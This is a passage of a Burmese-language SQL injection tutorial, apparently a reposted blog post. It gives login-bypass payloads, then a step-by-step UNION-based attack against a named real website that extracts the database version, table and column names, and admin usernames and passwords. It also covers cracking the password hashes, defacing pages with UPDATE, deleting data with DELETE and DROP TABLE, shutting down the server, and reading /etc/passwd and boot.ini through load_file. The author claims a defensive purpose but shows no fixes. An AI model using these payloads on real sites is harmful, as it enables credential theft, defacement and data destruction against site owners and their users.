REVOKE — remove access privileges
ROLLBACK — abort the current transaction
SELECT — retrieve rows from a table or view
SELECT INTO — create a new table from the results of a query
SET — change a run-time parameter
SET CONSTRAINTS — set the constraint mode of the current transaction
SET SESSION AUTHORIZATION — set the session user identifier and the current user identifier of the current session
SET TRANSACTION — set the characteristics of the current transaction
SHOW — show the value of a run-time parameter
START TRANSACTION — start a transaction block
TRUNCATE — empty a table
UNLISTEN — stop listening for a notification
UPDATE — update rows of a table
VACUUM — garbage-collect and optionally analyze a database
SQL Injection မွာ အသုံးၿပဳတဲ႔ အေၿခခံေတြပဲ ရွိပါေသးတယ္... ဒီထက္မ်ားတဲ႔ functions ေတြအမ်ားၾကီးရွိသလုိ ဒီထက္ပုိၿပီးနက္နဲတဲ႔ အသုံးၿပဳပုံေတြရွိပါတယ္... ေလ့လာတဲ႔သူေတြအေနနဲ႔ မိမိတုိ႔ကုိယ္တုိင္ SQL commands ေတြကုိ အရင္ဆုံး ကုိယ္တုိင္စမ္းစစ္ၿပီး မိမိတုိ႔ရဲ႕ SQL commands အသုံးၿပဳမႈအရည္အခ်င္းကုိ ၿမင့္တင္သင့္ပါတယ္။
မွတ္ခ်က္။ ။ဒီပို႕ေလးက online ေပၚမွာ ျပန္႕ေနတာၾကာျပီ။ဘာလို႕ copy ကူးျပီးျပန္တင္ရတာလဲဆို
ေတာ့ ကၽြန္ေတာ္ကိုယ္တိုင္သိမ္းထားခ်င္လို႕ပါ။ဒါေလးက အေျခခံက်ပါတယ္။သိသင့္သိထိုက္သူေတြလဲ
သိႏိုင္ၾကပါေစ။
Injection နဲ႔ပက္သက္တဲ႔အပုိင္းကုိ အေတြ႔အၾကံဳ မရင့္က်က္ေသးတဲ႔သူေတြ၊ အေတြ႔အၾကံဳရွိၿပီးတဲ႔သူေတြပါ နားလည္ႏုိင္ေအာင္ ကၽြန္ေတာ့္ရဲ႕ အၿမင္နဲ႔ နဲနဲေလာက္ Tutorial တစ္ခုအၿဖင့္ေရးသားလုိက္ပါတယ္။ SQL injectiong နဲ႔ပက္သက္တဲ႔ Tutorial ေတြကုိ Google မွာ ရွာၾကည့္လုိက္ပါက ေတာင္လုိပုံေနပါတယ္။ အားလုံးကေတာ့ အတူတူပါပဲ... SQL injector ေတြၿဖစ္ေစရန္တစ္ခုအတြက္မဟုတ္ပဲ SQL Injection နဲ႔အတူ php နဲ႔ mysql functions ေလးေတြကုိ သိကာ security ပုိင္းကုိ ထိန္းသိန္းကာကြယ္ႏုိင္ရန္အတြက္ ရည္ရြယ္၍ Computer ေ၀ါဟာရကုိ ၿမန္မာလုိ တုိက္ရုိက္ဘာသာၿပန္ရတာ နဲနဲေတာ့ နားရႈပ္သြားႏုိင္မယ္။ ဒါေပမဲ႔ အတတ္ႏုိင္ဆုံးေတာ့ နားလည္ေအာင္ ရွင္းၿပေပးလုိက္ပါတယ္။ SQL Injection ကုိေလ့လာတဲ႔အခါမွာ အေၿခခံ Web Developement ပုိင္းအေၿခခံရွိဖု႔ိေတာ့လိုပါလိမ့္မယ္.. ဒီ tutorial အတြက္ လုိအပ္တာကေတာ့ php နဲ႔ sql အေၾကာင္းသိထားရင္ နားလည္ေလာက္ပါတယ္။
---DATABASE ဆိုတာဘာလဲ?---
ရုိးရုိးရွင္းရွင္းပါပဲ... Database ဆုိတာဘာလဲဆုိရင္ Database ဆုိတာ အခ်က္အလက္ Data ေတြစုစည္းသိမ္းဆည္းထားတဲ႔ Application တစ္ခုပါပဲ... Application Programming Interface (API) ေတြကုိ တည္ေဆာက္ အသုံးၿပဳမယ္ ထိန္းသိမ္း သိမ္းဆည္းထားမယ္။ Database(DB) servers ေတြဟာ Web development လုပ္ငန္းေတြ နဲ႔လည္း ေပါင္းစည္းအသုံးၿပဳလုိ႔ရတဲ႔အတြက္ ၄င္းအထဲက data ေတြကုိ ထုတ္ယူအသုံးၿပဳ၊ ၾကည့္ရႈ႕ဖုိ႔ဆုိတာ ခက္ခဲ႔တဲ႔ကိစၥတစ္ခုေတာ့မဟုတ္ပါဘူး။ Database အထဲမွာ usernames, passwords စသည္ ေတြလုိ အေရးၾကီးတဲ႔ အခ်က္အလက္ေတြကုိလည္း သိမ္းဆည္းႏုိင္တာ ၿဖစ္တဲ႔အတြက္ Database ရဲ႕ လုံၿခံဳေရးဟာလည္း အလြန္ကုိအေရးၾကီးပါတယ္။ ထိန္းသိမ္းမႈ ညံ့ဖ်င္းတဲ႔ database တစ္နည္းအားၿဖင့္ အမွတ္တမဲ႔ၿဖစ္ေစ၊ သတိမမႈ၍ေသာ္လည္းေကာင္း၊ အေၾကာင္းေၾကာင္းအမ်ဳိးမ်ဳိးေၾကာင့္ programmer ေတြေရးသားထားတဲ႔ code ေတြရဲ႕ လြဲမွားမႈေတြ ေၾကာင့္ ဒီလုိဟာကြက္ေတြ ၿဖစ္ေပၚကာ database ထဲကုိ အၿခား တရားမ၀င္ ၀င္ေရာက္သူတုိ႔အား လမ္းဖြင့္ေပးသလုိၿဖစ္သြားတတ္ပါတယ္။ DB servers ေတြအမ်ားၾကီးရွိတဲ႔အထဲမွာ ဒါေလးေတြက အသုံးမ်ားတာေလးေတြပါ။
MySQL(Open source),
MSSQL,
MS-ACCESS,
Oracle,
Postgre SQL(open source),
SQLite စသည္ေပါ႔...
Database ရဲ႕ တည္ေဆာက္ပုံေလးကုိ ၿမင္ႏုိင္ေအာင္လုိ႔ ဇယားေလးနဲ႔ၿပထားတာပါ။
--- SQL INJECTION ဆုိသည္မွာ?---
SQL injection ဆုိတာကေတာ့ ယေန႔ေခတ္ အင္တာနက္စာမ်က္ႏွာေပၚမွာ အၿဖစ္အမ်ားဆုံး web application အမွားၿဖစ္ပါတယ္။ ၄င္း web application အမွားတစ္ခုမွေန၍ တရားမ၀င္ ၀င္ေရာက္အသုံးၿပဳသူေတြ (Hackers) က မိမိတုိ႔ရဲ႕ အေရးၾကီးတဲ႔ အခ်က္အလက္ေတြကုိ ခုိးယူသြားႏုိင္ပါတယ္။ ဒါေၾကာင့္ SQL injection ဆုိတာ web or db server တုိ႔ရဲ႕ အမွားေၾကာင့္မဟုတ္ပဲ အေတြ႔အၾကံဳမ့ဲ၊ အေရအခ်င္း ည့ံဖ်င္းတဲ႔ programming ေရးဆြဲသူေတြေၾကာင့္သာၿဖစ္ပါတယ္။ ဒီနည္းလမ္းက အေ၀းတစ္ေနရာကေန application, web server ကုိ အလြယ္ ကူဆုံးထိန္းခ်ဳပ္ႏုိင္ပါတယ္။ ဒီ SQL injection မွာ ပုံစံအမ်ဳိးမ်ဳိးေသာ SQL commands ေတြ နဲ႔ web page ကေန အမ်ဳိးမ်ဳိးေသာ data ေတြကို ထုတ္ယူႏုိင္ပါတယ္။
ဥပမာတစ္ခုအေနနဲ႔ေၿပာမယ္ဆုိရင္ ကၽြန္ေတာ္တုိ႔က Company တစ္ခုရဲ႕ Network တစ္ခုကုိ၀င္ေရာက္ေတာ့မယ္ဆုိရင္ port scanner ေတြနဲ႔ sanner ဖတ္ၿပီး အမွားေတြနဲ႕ ပြင့္ဟေနတဲ႔ port ကေန ၀င္ေရာက္သြားႏုိင္ပါတယ္။ ဒါေပမဲ႔လည္း အင္တာနက္နဲ႔ ခ်ိတ္ဆက္ထားတဲ႔ Web Server (Host Sever) တစ္ခုက port 80 ေလာက္ပဲဖြင့္မယ္၊ တစ္ၿခား security ပုိင္းေတြ ေပးထားမယ္ဆုိရင္ port scanner ဘယ္ေလာက္ေကာင္းေကာင္း အလုပ္ၿဖစ္မွာမဟုတ္ပါဘူး၊ ၀င္ေရာက္ဖုိ႔ခက္သြားပါလိမ့္မယ္( ခက္ခဲေနမယ္ )... ဒါဆုိရင္ Web Hacking ကုိ ဦးတည္ၿပီးေၿပာင္းၾကည့္ရပါလိမ့္မယ္... Web Hacking လုိ႔ေၿပာရင္ ေတာ္ေတာ္မ်ားမ်ားကေတာ့ SQL Injection ကုိပထမဦးစြာေၿပးၿမင္ၾကမွာပါပဲ... ဟုတ္တယ္ေလ.. SQL Injection ကတစ္ၿခားဘာမွမလုိဘူး Web Browser တစ္ခုပဲလုိတယ္...
---ေရွာင္ကြင္း ၀င္ေရာက္ၿခင္း---
Site ေတြမွာ username, password ေတြနဲ႔ login ၀င္ခုိင္းတယ္ဆုိတာ site အထဲမွာ ရွိတဲ႔ content ေတြကုိ မွတ္ပုံတင္ထားတဲ႔သူ (username & password ရွိထားတဲ႔သူ) ေတြကုိသာ ၾကည့္ရႈအသုံးၿပဳခြင့္ေပးထားတာပါ။ အကယ္၍ မိတ္ေဆြက username & password မရွိပဲ ရွိသကဲ႔သုိ႔ ၀င္ေရာက္အသုံးၿပဳမယ္ (user registration မလုပ္ပဲ ၀င္ေရာက္တယ္) ဆုိရင္ ဒါကုိ BYPASSING LOGINS လုပ္တယ္လုိ႔ေခၚပါတယ္။ ဒါကေတာ့ programmer ရဲ႕ login မွာစီစစ္မႈ မေသခ်ာလုိ႔ ၿဖစ္တဲ႔အတြက္ ကံေကာင္းေထာက္မစြာနဲ႔ User name နဲ႔ Password ကုိမသိပဲ login ၀င္လုိ႔ရသြားပါလိမ့္မယ္။
ဥပမာတစ္ခုအေနနဲ႔ ၾကည့္မယ္ဆုိရင္ username က admin ၿဖစ္ၿပီး password က 12345 ဆုိၾကပါစုိ႔... ဒါဆိုရင္ SQL query က
SELECT USER from database WHERE username='admin' AND password='12345' ဆုိၿပီးၿဖစ္သြားပါလိမ့္မယ္..... အကယ္၍ အေပၚ SELECT command တန္ဖုိးက မွန္တယ္ဆုိရင္ site ထဲကုိ ၀င္ခြင့္ၿပဳမွာၿဖစ္ပါတယ္။ အကယ္၍ အထက္ပါေၿပာခဲ႔သလုိ programmer က login မွာမွန္ကန္တဲ႔စီစစ္မႈမရွိရင္ Hacker ေတြက ေအာက္ပါအတုိင္း ၀င္ေရာက္သြားႏုိင္ပါတယ္။
username:a or 1=1--
password:blank
SQL query မွာေတာ့
SELECT USER from database WHERE username='a' or 1=1-- AND password=''
ဒါက comment operator ပါ အဲ႔လုိပဲ အၿခား comment operator က /* ၿဖစ္ပါတယ္။
SELECT USER from database WHERE username='a' or 1=1
1=1 က အၿမဲတန္း query ကုိ true ၿဖစ္ေစၿပီး OR ကေတာ့ query တစ္ခုက true ၿဖစ္တဲ႔အတြက္ အၿခားတစ္ခုကုိလည္း true ၿဖစ္သြားေစပါတယ္ဒါေၾကာင့္ 'a' ဆုိတဲ႔ user ဟာ DB မွာမရွိေတာင္မွ ဒီ query က true ၿဖစ္ကာ site admin ကို၀င္ေရာက္ခြင့္ေပးသြားပါလိမ့္မယ္... ဒီလုိနည္းနဲ႔ Vulnerable ၿဖစ္တဲ႔ site ေတြအတြက္ ေအာက္ပါအတုိင္း စမ္းစစ္ႏုိင္ပါေသးတယ္...
username:' or 1='1 password:' or 1='1
username:' or '1'='1' password:' or '1'='1'
username:or 1=1 password:or 1=1
--- လ်ဳိ႕၀ွက္ထားေသာ Data မ်ားကုိ ၀င္ေရာက္အသုံးၿပဳၿခင္း---
SQL injection က အခုလုိ bypassing logins တစ္ခုတည္းမဟုတ္ပဲ DB servers ကေန လ်ဳိ႕၀ွက္စြာသိမ္းဆည္းထားတဲ႔ Data ေတြကုိ ရယူႏုိင္ပါတယ္... အနည္းငယ္ရႈပ္ေထြးေနမွာၿဖစ္တဲ႔အတြက္ နဲနဲေလး အထူးဂရုၿပဳၿပီးေတာ့ ေလ့လာၾကည့္ပါ။ ေအာက္ပုိင္းမွာ လက္ေတြ႔စမ္းလုိ႔ရေအာ္ site link နဲ႔ တကြ ေဖာ္ၿပေပးထားပါတယ္။
---အားနည္းခ်က္ အမွားမ်ား ရွာေဖြစစ္ေဆးၿခင္း---
Site တစ္ခုကုိရွာလုိက္မယ္...
In PHP ==>>
www.site.com/article.php?id=5
id variable assign လုပ္ထားတဲ႔ ေနာက္နားက ' (apostrophe) ေလးတစ္ခုကုိ ထည့္လုိက္ပါမယ္..
www.site.com/article.php?id=5'
ဒီလုိလုိ စမ္းတဲ႔ေနရာမွာ
Integer Based
www.site.com/script.php?param=36'
www.site.com/script.php?param='36'
www.site.com/script.php?param=(12+24)
www.site.com/script.php?param=%
www.site.com/script.php?param=36'a
String Based
www.site.com/script.php?param=Text'--
www.site.com/script.php?param=Te'+'xt
www.site.com/script.php?param=Tex%
ဆုိၿပီးရွိပါတယ္.. အဆင္ေၿပသလုိ စမ္းသပ္ႏုိင္ပါတယ္...
အကယ္၍ ၄င္းရဲ႕ site က vulnerable မၿဖစ္ဘူးဆုိရင္ ပုံမွန္အတုိင္း page loading လုပ္သြားပါလိမ့္မယ္..
အဲ႔လုိမဟုတ္ပဲ query string filtering မရွိဘူးဆုိရင္ "MySQL Syntax Error By '5'' In Article.php on line 15." သုိမဟုတ္ Check the correct MySQL version သုိ႔မဟုတ္ MySQL Fetch error သုိ႔မဟုတ္ပါက ဘာမွမေပၚပဲ page အၿဖဴၾကီးသာေပၚေနပါလိမ့္မယ္... ဒါဆုိရင္ ဒီ site က vulnerable ၿဖစ္ေနပါတယ္ အကယ္၍ ' ၿဖင့္ မရလွ်င္ ေအာက္ပါအတုိင္း union select 1-- ဆုိတာကုိသုံးႏုိင္ပါတယ္။
www.site.com/article.php?id=5 union select 1--
In ASP ==>>
အထက္ပါနည္းအတုိင္း
http://www.site.com/index.asp?id=5
ဆုိရင္ ေနာက္က ' (apostrophe) ေလးထည့္ၿပီးစမ္းႏုိင္ပါတယ္။
http://www.site.com/index.asp?id=5'
ဒါဆုိရင္
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
ဆုိတဲ႔ error မ်ဳိးေပၚေနတတ္ၿပီး ASP, JSP, CGI, နဲ႔ PHP web pages ေတြမွာ စမ္းသပ္ႏုိင္ပါတယ္။
အကယ္၍ URL မွာ မေပၚတဲ႔ parameters မ်ဳိးဆုိရင္ ၄င္းတုိ႔ရဲ႕ login page, search page, feedback လုိေနရာမ်ဳိးေတြက ရွာႏုိင္ပါတယ္.. တစ္ခ်ဳိ႕ html page ေတြက POST command နဲ႔ ASP page ကုိ ပုိ႔ေဆာင္ေပးတဲ႔ parameters သုံးထားတတ္ပါတယ္.. ဒါဆုိရင္ေတာ့ ၄င္းတုိ႔ရဲ႕ HTML source code ထဲကုိ ၀င္ေရာက္ပါ။ ၿပီးရင္ "FORM" tag ကုိရွာလုိက္ပါ ... ဥပမာ
span class="tags">FORM action=Search/search.asp method=post>
span class="tags">input type=hidden name=A value=C>
span class="tags">/FORM>
ဒီ span class="tags">FORM>span class="tags">/FORM> ႏွစ္ခုၾကားက ၿဖစ္ႏုိင္ေၿခေတြပါ။
span class="tags">FORM action=http://duck/Search/search.asp method=post>
span class="tags">input type=hidden name=A value='a' or 1=1--">
span class="tags">/FORM>
value မွာ အေပၚကအတုိင္း BYPASSING LOGINS မွာသုံးသလုိ စမ္းသပ္ၿပီးရွာေဖြႏုိင္ပါတယ္။
---Columns အေရအတြက္ရွာေဖြၿခင္း---
‘order by’ ကုိအသုံးၿပဳၿပီး Columns မ်ားကုိ ရွာေဖြမွာၿဖစ္ပါတယ္..
URL query ကုိေအာက္ပါတုိင္း ရုိက္ထည့္လုိက္ပါမယ္... '/*' သုိ႔မဟုတ္ '--" ဆုိတာေလးသုံးလုိ႔ရပါတယ္..
www.site.com/article.php?id=5 order by 1/*
အမွားမေပၚဘူးဆုိရင္ ေနာက္တစ္ခါ 2 ဆုိၿပီးတုိးကာ ရုိက္ထည့္ပါမယ္
www.site.com/article.php?id=5 order by 2/*
ယခုအခ်ိန္အထိ အမွားမေပၚေသးဘူးဆုိရင္ ေနာက္တစ္ ထပ္ၿပီးတုိးပါမယ္.. ဒီလုိတုိးတုိးၿပီး အမွားေပၚလာတဲ႔အထိ ရွာေဖြရမွာၿဖစ္ပါတယ္...
www.site.com/article.php?id=5 order by 3/*
အခု 3 ကုိေရာက္တဲ႔အခါ အမွားေတြ႔တယ္ဆုိရင္
ဒါဆုိရင္ ကၽြန္ေတာ္တုိ႔ Columns ႏွစ္ခုရွိတယ္ဆုိတာ သိသြားပါၿပီ... ဒီလုိနည္းနဲ႔ Column ေတြကုိ တစ္ဆင့္ၿခင္းရွာေဖြရပါတယ္...
ေနာက္တစ္ခု ပုံနဲ႔ တကြ ရွာေဖြၾကည့္ရေအာင္
http://sbisa.org/circle.php?id=26 ကုိၾကည့္မယ္..
http://sbisa.org/circle.php?id=26 ရဲ႕ value ေနာက္မွာ ' ဆုိတဲ႔ (apostrophe) တစ္ခုထည့္လုိက္ပါမယ္..
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sbisaor/public_html/circle.php on line 10 ဆုိတဲ႔ error တစ္ခုေတြ႔ပါလိမ့္မယ္..
ဒါဆုိရင္ေသခ်ာတယ္.. SQL error တစ္ခုတက္ေနၿပီ... တိတိက်က်ေၿပာရရင္ DB Server က MySQL
OK, ဒါဆုိရင္ ကၽြန္ေတာ္တုိ႔ Columns အေရအတြက္ရွာမယ္...
http://sbisa.org/circle.php?id=-26 order by 1,2,3,4,5,6-- ဒီအထိအဆင့္အဆင့္ရွာတယ္... error မၿဖစ္ေသးဘူး
7 အထိေရာက္တဲ႔အခါမွာေတာ့ error ေတြ႔တယ္ဆုိရင္ ဒါဟာ 6 Columns ရွိတယ္..
ဒါဆုိရင္ေနာက္ထပ္ UNION SELECT ALL ဆုိတဲ႔ statement တစ္ခုကုိသုံးမယ္..
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,4,5,6-- ဆုိၿပီးရုိက္ထည့္လုိက္မယ္..
ဒါဆုိရင္ 2,3,4 ဆုိတာၿပမယ္.. ဒီအပုိင္းေတြက data ေတြသိမ္းဆည္းထားတဲ႔ Columns ေတြၿဖစ္တယ္...
---MySQL version ရွာၿခင္း---
ဒီ Injection မွာ MySQL Version ကုိ checking လုပ္ဖုိ႔လုိပါတယ္... . Version အား Checking လုပ္ရန္ @@version သုိ႔မဟုတ္ version() functions ေတြကုိသုံးေပးရပါမယ္..
အခု @@version ကုိ data ေတြသိမ္းဆည္းထားတဲ႔ column မွာထည့္ၿပီး MySQL version ကုိစစ္မယ္..
http://sbisa.org/circle.php?id=-26 union select all 1,@@version,3,4,5,6--
သုိ႔မဟုတ္
http://sbisa.org/circle.php?id=-26 union select all 1,version(),3,4,5,6--
ကုိသုံးႏုိင္ပါတယ္.. တခါတစ္ေလမွာ အထက္ပါနည္းအတုိင္းက error ေတြၿဖစ္တတ္တဲ႔အတြက္ unhex(hex()) ကုိသုံးေပးရပါမယ္..
http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex(@@version)),3,4,5,6--
ဒါဆုိရင္ Server မွာ အသုံးၿပဳေနတဲ႔ MySQL ရဲ႕ version ကုိေဖာ္ၿပေပးသြားပါလိမ့္မယ္...
အကယ္၍ user တုိ႔ ၊ database တုိ႔ကုိ check ခ်င္တယ္ဆုိရင္ ေအာက္ပါတုိင္း checking လုပ္ႏုိင္ပါတယ္..
www.site.com/article.php?id=5 UNION ALL SELECT user(),2/*
www.site.com/article.php?id=5 UNION ALL SELECT database(),2/*
ဥပမာ :- http://sbisa.org/circle.php?id=-26 union select all 1,version(),database(),user(),5,6--
--MySQL 5 ႏွင့္အထက္ injection---
အခုကၽြန္ေတာ္တုိ႔ ရတာ MySQL version 5.0.90 ၿဖစ္ပါတယ္... MySQL version 5 မွာ information_schema ဆုိတဲ႔ အသုံး၀င္တဲ႔ funtion တစ္ခုပါ၀င္ၿပီး ၄င္းက လက္ရွိ DB server ရဲ႕ tables နဲ႔ columns ေတြကုိ ထိန္းသိမ္းထားတာၿဖစ္ပါတယ္...
Tables ေတြကုိရယူရန္ table_name from information_schema.tables ဆုိတာကုိသုံးသလုိ
Columns ေတြကုိရယူရန္ column_name from information_schema.columns ဆုိတာကုိသုံးရပါမယ္..
ေနာက္တစ္ခုကေတာ့ ဒီ site အေပၚမွာ ၿမင္ရေအာင္လုိ႔ group_concat(table_name) ကုိ Tables ေတြအတြက္နဲ႔
group_concat(column_name) ကုိ Columns ေတြအတြက္သုံးေပးရပါတယ္...
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--
ေစာေစာက ကၽြန္ေတာ္တုိ႔ MySQL version ကုိ @@version အစား unhex(hex()) နဲ႔သုံးခဲ႔ရတယ္ဆုိရင္ အခု Table နဲ႔ Column ကုိရွာတဲ႔အခါမွာလည္း အဲ႔လုိပဲ သုံးေပးရပါတယ္။
http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex()),3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--
ေနာက္ထက္တစ္ခါ ကၽြန္ေတာ္တုိ႔ Columns ေတြကုိၾကည့္မယ္ဆုိရင္
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_schema=database()--
ဒါဆုိရင္ DB ထဲက table ေတြကုိ ေဖာ္ၿပေပးပါၿပီ... အခု ကၽြန္ေတာ္တု႔ိဒီ tables ေလးေတြကုိ စနစ္တက် မွတ္သားထားပါမယ္... ေနာက္တစ္ဆင့္တက္ကာ ကၽြန္ေတာ္တုိ႔လုိခ်င္တဲ႔ user name နဲ႔ password ေတြ သိမ္းထားတဲ႔ table ကုိၾကည့္ပါမယ္...
group_concat ကုိပဲ ဆက္လက္သုံးပါမယ္.. ဒါေပမဲ႔ ကၽြန္ေတာ္တုိ႔ လုိခ်င္တဲ႔ username, password ေတြသိမ္းထားေလာက္တဲ႔ columns ေတြထဲက စစ္ထုတ္ယူမွာပါ။ ဒီေနရာမွာ ကၽြန္ေတာ္တုိ႔ မွန္းထားတဲ႔ table အမည္ကုိ from information_schema.tables where table_schema=database-- ေနရာမွာ ထည့္သြင္းမွာၿဖစ္ပါတယ္..
0x3a ဆုိတာကေတာ့ ":" ရဲ႕ hex code ပါ။
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(username,0x3a,password),5,6 from admin--
ဒါဆုိရင္ေတာ့ မိမိတုိ႔လုိခ်င္တဲ႔ username နဲ႔ password ကုိရသြားပါၿပီ... ရရွိထားတဲ႔ password ဟာ plaintext ၿဖစ္တယ္ဆုိရင္ေတာ့ ထပ္ၿပီးေခါင္းရႈပ္စရာမလုိေတာ့ဘူးေပါ႔
တစ္ခ်ဳိ႕ကေတာ့ password hashed လုပ္ထားတဲ႔ အတြက္ ၄င္းတုိ႔အား hash cracker ေတြနဲ႔ ေၿဖထုတ္ေပးရပါလိမ့္မယ္..
ဥပမာ admin:3a39ec8cd0c399cc247936ad5e0b6927
John The Ripper
www.openwalls.org
Cain & Able
www.oxid.it
hash လုပ္ထားတဲ႔ password ေတြသာဆုိရင္ေတာ့ အနည္းငယ္ခက္သြားပါလိမ့္မယ္... အထက္ပါ hash ကုိ crack လုပ္လုိက္ရင္ admin:PlanetCreator ဆုိၿပီးရပါမယ္..
ကဲ ဒါဆုိရင္ေတာ့ admin နဲ႔ password ကုိရၿပီဆုိရင္ ကုိယ္လုပ္ခ်င္သလုိလုပ္ေပေတာ့..
---MySQL version 4 injection---
MySQL version က 4 ၿဖစ္မယ္ဆုိရင္ version 5 လုိ information_schema.tables and information_schema.columns ကုိ support မလုပ္တဲ႔အတြက္ table name နဲ႔ column name ေတြကုိ guess လုပ္ရပါတယ္... ေနာက္တစ္ခုက error message အေပၚမွာအေၿခခံၿပီးခန္႔မွန္းရတာပါ။ The error reports pnc_article in the error ဆုိရင္ pnc ဆုိတဲ႔ prefix ကုိသုံးထားတဲ႔အတြက္ table name က pnc ဆုိတာ ခန္႔မွန္းလုိ႔ရႏုိင္ပါတယ္။
ဥပမာ ကၽြန္ေတာ္က table name ကုိ user ဆုိၿပီး ခန္႔မွန္းလုိက္မယ္.. ဒါဆုိရင္ ေအာက္ပါအတုိင္းရုိက္ထည့္ေပးၾကည့္မယ္ဆုိပါစုိ႔
www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM user/*
အထက္ပါအတုိင္းရုိက္ထည့္လုိက္လုိ႔ error ၿဖစ္ေနတယ္ဆုိရင္ ဒါဟာ table မရွိလုိပဲ... ေနာက္တစ္ခါထပ္ၿပီး guess လုိက္ပါ... table name ကုိ tbluser ဆုိၿပီးထားလုိက္ပါမယ္..
www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM tbluser/*
ဒီလုိနည္းနဲ႔ table name ေတြ column ေတြအား ခန္႔မွန္းၿပီးထည့္သြားရပါလိမ့္မယ္...
www.site.com/article.php?id=5 UNION ALL SELECT user_name,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT username,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT pass,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT password,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 FROM tbluser/*
ေနာက္ဆုံး username နဲ႔ password ကုိ ရတဲ႔အထိေပါ႔...
Table name အခ်ိဳ႕ပါ : user(s), table_user(s), tbluser(s), tbladmin(s), admin(s), members, etc.
ဒါဟာ Injection ရဲ႕ လ်ဳိ႕၀ွက္ထားတဲ႔ Data မ်ားကုိ ရယူတဲ႔အပိုင္းၿဖစ္ပါတယ္... Admin ရဲ႕ username & password ရၿပီဆုိရင္ Admin Login Page မွာရုိက္ထည့္ရပါမယ္... Joomla ဆုိရင္ /administrator နဲ႔ Wordpress ဆုိရင္ /wp-admin ၿဖစ္ပါတယ္.. အခ်ဳိ႕ site ေတြက admin panel ကုိရွာရခက္ ေနပါလိမ့္မယ္.. ဒါဆုိရင္ admin panel finder ေလးေတြကုိသုံးၿပီးရွာေဖြရပါလိမ့္မယ္...
Admin Panel Finder http://www.planetcreator.net/planetcreator/adminpanelfinder/ နဲ႔ရွာႏုိင္ပါတယ္။
---Site အားၿပင္ဆင္ၿခင္း ---
အခ်ဳိ႕ေသာ Site ေတြက admin ရဲ႕ password ကုိရေပမဲ႔ admin panel ကုိရဖုိ႔ခက္ခဲၿခင္း၊ ရွာမေတြ႔ၿခင္းေတြနဲ႔ ၾကံဳရတတ္ပါတယ္... ဒီလုိေနရာမွာ SQL commands ေတြကုိသုံးၿပီး အထဲက site ရဲ႕ contents ေတြကုိၿပင္ဆင္ေၿပးသြားရမွာၿဖစ္ပါတယ္...
ဒါေလးေတြက အေရးပါတဲ႔ command ေလးေတြပါ
UPDATE: It is used to edit infos already in the db without deleting any rows.
DELETE: It is used to delete the contents of one or more fields.
DROP: It is used completely delete a table & all its associated data.
UPDATE :-
www.site.com/article.php?id=5
ဆုိၾကပါစုိ႔ကၽြန္ေတာ္တုိ႔ရဲ႕ query က ေအာက္ပါအတုိင္းၿဖစ္မယ္ဆုိရင္
SELECT title,data,author FROM article WHERE id=5
(table name နဲ႔ column ေတြက အထက္ပါအတုိင္းရွာေဖြက ထည့္ေပးရတာၿဖစ္ပါတယ္)
ေအာက္ပါအတုိင္း site ကုိၿပင္ေပးသြားပါမယ္...
www.site.com/article.php?id=5 UPDATE article SET title='Hacked By SomeOn3'/*
ခက္ဆန္းဆန္းေလး ထက္ၿပီး အရစ္တက္လုိက္မယ္ဆုိရင္
www.site.com/article.php?id=5 UPDATE article SET title='HACKED BY SomeOn3',data='Welcome to My Planet',author='SomeOn3'/*
သတ္မွတ္ထားတဲ႔ page ေၿပာင္းလဲၿပီး update လုပ္ခ်င္တယ္ဆုိရင္ေတာ့ ေအာက္ပါအတုိင္း ရုိက္ထည့္ေပးရပါတယ္..
www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/*
DELETE:- DB Server ထဲကေန အၿမဲတမ္းဖ်က္ပစ္ေတာ့မယ္ဆုိရင္ DELETE command ကုိသုံးသြားပါမယ္..
www.site.com/article.php?id=5 DELETE title,data,author FROM article/*
သတ္မွတ္ထားတဲ႔ page ကုိ delete လုပ္ခ်င္တယ္ဆုိရင္ ေအာက္ပါ table name ရဲ႕ ေနာက္ထဲမွ WHERE နဲ႔ page id ကုိထည့္သြင္းသြားရပါမယ္...
www.site.com/article.php?id=5 DELETE title,data,author FROM article WHERE id=5/*
ဒီတစ္ခုကေတာ့ DROP TABLE ပါ... Table အလုိက္ ဖ်က္ခ်င္တယ္ ဆုိရင္ေတာ့ DROP Table နဲ႔ table name ကုိဆုိၿပီးသုံးပါမယ္...
www.site.com/article.php?id=5 DROP TABLE article/*
ဒီအတုိင္းဖ်က္ရင္ table ေတြေကာ အထဲမွာပါတဲ႔ contents ေတြေကာ အားလုံး ပ်က္သြားပါလိမ့္မယ္...
SHUTTING DOWN MySQL SERVER:
www.site.com/article.php?id=5 SHUTDOWN WITH NOWAIT;
LOADFILE:
Server အထဲက .htaccess, .htpasswd ေတြနဲ႔ password files ေတြၿဖစ္တဲ႔ etc/passwd စသည့္ ဖုိင္ေတြကုိ ယူခ်င္တယ္ဆုိရင္ေတာ့ LOADFILE ကုိသုံးရပါတယ္... ဒါကအသုံးေတာ့နည္းပါတယ္....
www.site.com/article.php?id=5 UNION ALL SELECT load_file('etc/passwd'),2/*
အကယ္၍ hex ေတြနဲ႔ဆုိရင္ေတာ့ ေအာက္ပါတုိင္း သုံးပါမယ္..
www.site.com/article.php?id=5 UNION ALL SELECT load_file(0x272F6574632F70617373776427)
ဒါကုိ Hex based SQL Injection လုိ႔လည္းေခၚႏုိင္ပါတယ္..
* SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
ဒါဟာ server ရဲ႕ c:\boot.ini ကုိ ဆြဲယူေပးပါလိမ့္မယ္..
